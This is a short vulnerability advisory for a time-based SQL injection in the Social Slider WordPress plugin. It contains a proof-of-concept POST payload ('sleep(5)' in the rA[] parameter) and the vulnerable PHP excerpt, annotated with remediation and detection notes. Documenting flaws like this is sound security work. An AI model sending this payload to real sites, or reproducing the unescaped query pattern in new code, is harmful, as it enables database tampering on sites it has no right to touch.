# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar (at) gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)
---------------
PoC (POST data)
---------------
http://<wordpress-site>/wp-content/plugins/social-slider-2/ajax.php
action=ZapiszPozycje&rA[]=1 and sleep(5)
---------------
Vulnerable code
---------------
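<?php
/*
 * Vulnerable excerpt of the plugin's ajax.php, as quoted by the advisory.
 * Keywords, variable names, operators and string spacing are restored from
 * a garbled copy. The logic is deliberately left unfixed, because this
 * listing is the advisory's exhibit of the flaw.
 *
 * Behaviour: on a POST with action=ZapiszPozycje, the script walks the
 * posted array and stores a running position (lp = 1, 2, 3, ...) on the
 * socialslider row named by each array element.
 *
 * Why it is injectable: each array element is concatenated into the UPDATE
 * statement as a bare, unquoted value in the WHERE clause. Anything that
 * follows the number becomes part of the SQL statement. String escaping
 * would not help here, since no quote has to be broken out of.
 *
 * Remediation: force each id to an integer before use ((int) / intval()),
 * or build the statement with $wpdb->prepare() and a %d placeholder and run
 * it through $wpdb->query(). Nothing in this excerpt checks who is making
 * the request, so a capability check (current_user_can()) and a nonce check
 * (check_ajax_referer()) belong in front of the update as well.
 *
 * Detection: POST requests to this file whose rA[] values are not plain
 * integers, particularly when the response is unusually slow.
 */

// Loads WordPress directly, so the file can be requested by URL on its own.
// Path reconstructed: the plugin directory sits three levels below the
// WordPress root, per the URL shown in the PoC.
require_once(dirname(__FILE__) . '/../../../wp-config.php');
global $wpdb, $table_prefix;

// Request-controlled array of row ids. The garbled copy read ['a']; the PoC
// posts rA[], so 'rA' is the key that lets the PoC reach the loop below.
$SocialSliderArray = $_POST['rA'];

// The escaping call only touches the value being compared against a constant.
// It has no effect on the ids used in the query.
if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
{
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
    {
        // VULNERABLE: $recordIDValue reaches the statement unvalidated and
        // unquoted. $lC is a local counter and is not attacker-influenced.
        $query = "UPDATE " . $table_prefix . "socialslider SET lp = " . $lC . " WHERE id = " . $recordIDValue;
        // mysql_query() belongs to the legacy mysql extension (removed in
        // PHP 7.0) and offers no parameter binding.
        mysql_query($query);
        $lC = $lC + 1;
    }
}
?>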